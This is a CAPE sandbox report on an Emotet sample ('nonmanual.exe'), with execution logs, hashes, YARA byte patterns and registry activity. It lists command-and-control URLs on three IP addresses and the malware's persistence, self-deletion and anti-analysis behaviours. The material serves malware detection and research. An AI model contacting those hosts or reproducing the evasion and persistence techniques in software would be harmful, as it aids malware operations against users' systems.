2019-12-03 05:51:41,963 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:41,963 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1272
2019-12-03 05:51:41,980 [root] DEBUG: GetHookCallerBase: thread 1924 (handle 0x0), return address 0x0052CA2A, allocation base 0x00520000.
2019-12-03 05:51:41,980 [root] DEBUG: set_caller_info: Adding region at 0x00A90000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:41,996 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:41,996 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:42,010 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:42,010 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:42,073 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1272_87354923512131432122019
2019-12-03 05:51:42,073 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:42,088 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00520000.
2019-12-03 05:51:42,088 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00520000
2019-12-03 05:51:42,088 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:42,088 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00520000.
2019-12-03 05:51:42,088 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:42,119 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1272_151840447812131432122019
2019-12-03 05:51:42,135 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x11a00.
2019-12-03 05:51:42,135 [root] DEBUG: DLL unloaded from 0x74870000.
2019-12-03 05:51:42,135 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:42,151 [root] DEBUG: DLL unloaded from 0x74C10000.
2019-12-03 05:51:42,151 [root] INFO: Notified of termination of process with pid 1272.
2019-12-03 05:51:51,230 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\crypt32 (0x11d000 bytes).
2019-12-03 05:51:51,230 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:51,262 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-12-03 05:51:51,278 [root] DEBUG: DLL loaded at 0x77130000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-12-03 05:51:51,292 [root] DEBUG: DLL loaded at 0x756C0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-12-03 05:51:51,309 [root] DEBUG: DLL loaded at 0x75FF0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-12-03 05:51:51,323 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-12-03 05:51:51,323 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-12-03 05:51:56,986 [root] DEBUG: DLL loaded at 0x745F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-12-03 05:51:57,065 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-12-03 05:51:57,081 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x76090000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-12-03 05:51:57,111 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-12-03 05:51:57,111 [root] DEBUG: DLL loaded at 0x74AE0000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-12-03 05:51:57,128 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:51:57,128 [root] DEBUG: DLL loaded at 0x76080000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL loaded at 0x74A60000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL unloaded from 0x74A80000.
2019-12-03 05:51:57,174 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x74A60000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x74A60000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E90000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E70000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x75150000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E10000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x75140000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x74A30000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x74A20000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-12-03 05:51:57,236 [root] DEBUG: DLL loaded at 0x749E0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-12-03 05:51:57,252 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-12-03 05:51:57,267 [root] DEBUG: DLL loaded at 0x74980000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-12-03 05:51:57,283 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL loaded at 0x74950000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-12-03 05:51:57,299 [root] DEBUG: DLL unloaded from 0x74950000.
2019-12-03 05:51:59,576 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:52:06,924 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x74980000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x758D0000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:52:14,568 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:54:19,165 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-12-03 05:54:19,165 [root] INFO: Created shutdown mutex.
2019-12-03 05:54:20,210 [lib.api.process] INFO: Terminate event set for process 1676
2019-12-03 05:54:20,242 [root] DEBUG: Terminate Event: Attempting to dump process 1676
2019-12-03 05:54:20,242 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF270000.
2019-12-03 05:54:20,242 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:54:20,257 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF270000.
2019-12-03 05:54:20,319 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2019-12-03 05:54:23,283 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1676_18285120162354532122019
2019-12-03 05:54:23,283 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2baa00.
2019-12-03 05:54:23,283 [lib.api.process] INFO: Termination confirmed for process 1676
2019-12-03 05:54:23,283 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1676
2019-12-03 05:54:23,299 [root] INFO: Terminate event set for process 1676.
2019-12-03 05:54:23,299 [root] INFO: Terminating process 1676 before shutdown.
2019-12-03 05:54:23,299 [root] INFO: Waiting for process 1676 to exit.
2019-12-03 05:54:24,345 [lib.api.process] INFO: Terminate event set for process 912
2019-12-03 05:54:24,361 [root] DEBUG: Terminate Event: Attempting to dump process 912
2019-12-03 05:54:24,361 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:54:24,375 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:54:24,391 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:54:24,391 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:54:24,516 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\912_11958270482454532122019
2019-12-03 05:54:24,548 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:54:24,548 [lib.api.process] INFO: Termination confirmed for process 912
2019-12-03 05:54:24,548 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 912
2019-12-03 05:54:24,548 [root] INFO: Terminate event set for process 912.
2019-12-03 05:54:24,548 [root] INFO: Terminating process 912 before shutdown.
2019-12-03 05:54:24,548 [root] INFO: Waiting for process 912 to exit.
2019-12-03 05:54:25,548 [root] INFO: Shutting down package.
2019-12-03 05:54:25,549 [root] INFO: Stopping auxiliary modules.
2019-12-03 05:54:25,549 [root] INFO: Finishing auxiliary modules.
2019-12-03 05:54:25,552 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-12-03 05:54:25,553 [root] WARNING: File at path "C:\HBzTSUSYC\debugger" does not exist, skip.
2019-12-03 05:54:25,555 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-03 target-03 ESX 2019-12-03 05:50:31 2019-12-03 05:55:08

File Details

File Name nonmanual.exe
File Size 371397 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4a19c0efa79d514e9003f0fb5abfa93d
SHA1 87c3ebe34ff049e02b24305cf7b6df0dda502a3b
SHA256 d3717429ba31832577c8a24fe89a4be77aa9198f351fa5a2911c95b20c4e9e39
SHA512 d9dfba254ec7ac780e75126c317e559288b28dc8882bd8b5e1e12dae9fdc41c9a9f5db1be3a6fc8c24651aac01d5552678ddfb0e8b3a776d13fea37f6ba1a463
CRC32 42BA7649
Ssdeep 6144:uyojDQSFZbS+pzaSKSa0/fUnt0vJgk2TBsGhw2/K6786TEnCAIpi9MxipEl7BuHh:MDQSzDq0mTMbGW
TrID
  • 61.7% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 14.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 10.0% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1952 trigged the Yara rule 'Emotet'
Hit: PID 1272 trigged the Yara rule 'Emotet'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: nonmanual.exe, PID 1952
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
Performs HTTP requests potentially not found in PCAP.
url: 144.76.56.36:8080/add/walk/teapot/
url: 165.227.156.155:443/window/cookies/tpt/
url: 78.47.106.72:8080/taskbar/publish/tpt/
CAPE extracted potentially suspicious content
nonmanual.exe: Emotet Payload
nonmanual.exe: [{u'strings': [u'{ 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 40 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }', u'{ 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
Drops a binary and executes it
binary: C:\Windows\SysWOW64\compontitle.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://165.227.156.155:443/window/cookies/tpt/
Performs some HTTP requests
url: http://165.227.156.155:443/window/cookies/tpt/
The binary contains an unknown PE section name indicative of packing
unknown section: name: /4, entropy: 1.96, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_8BYTES, raw_size: 0x00000400, virtual_size: 0x00000358
unknown section: name: /19, entropy: 6.10, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x0000da00, virtual_size: 0x0000d972
unknown section: name: /31, entropy: 4.67, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00002000, virtual_size: 0x00001ffc
unknown section: name: /45, entropy: 5.74, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00002200, virtual_size: 0x000020d5
unknown section: name: /57, entropy: 4.70, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_4BYTES, raw_size: 0x00000c00, virtual_size: 0x00000bc4
unknown section: name: /70, entropy: 4.28, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00000400, virtual_size: 0x0000031c
unknown section: name: /81, entropy: 3.51, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00001a00, virtual_size: 0x000019f2
unknown section: name: /92, entropy: 2.55, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00000800, virtual_size: 0x00000608
The binary likely contains encrypted or compressed data.
section: name: .data, entropy: 6.87, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES, raw_size: 0x00014200, virtual_size: 0x00014020
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\compontitle.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (464) called API GetSystemTimeAsFileTime 2533026 times
Installs itself for autorun at Windows startup
service name: compontitle
service path: "C:\Windows\SysWOW64\compontitle.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\compontitle.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Hosts

Direct IP Country Name
Y 78.47.106.72 Germany
Y 165.227.156.155 Germany
Y 144.76.56.36 Germany

DNS

No domains contacted.


Summary

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_LOCAL_MACHINE\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\RequiredPrivileges
HKEY_USERS\.DEFAULT\Control Panel\Desktop
HKEY_USERS\.DEFAULT\Control Panel\Desktop\SmoothScroll
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
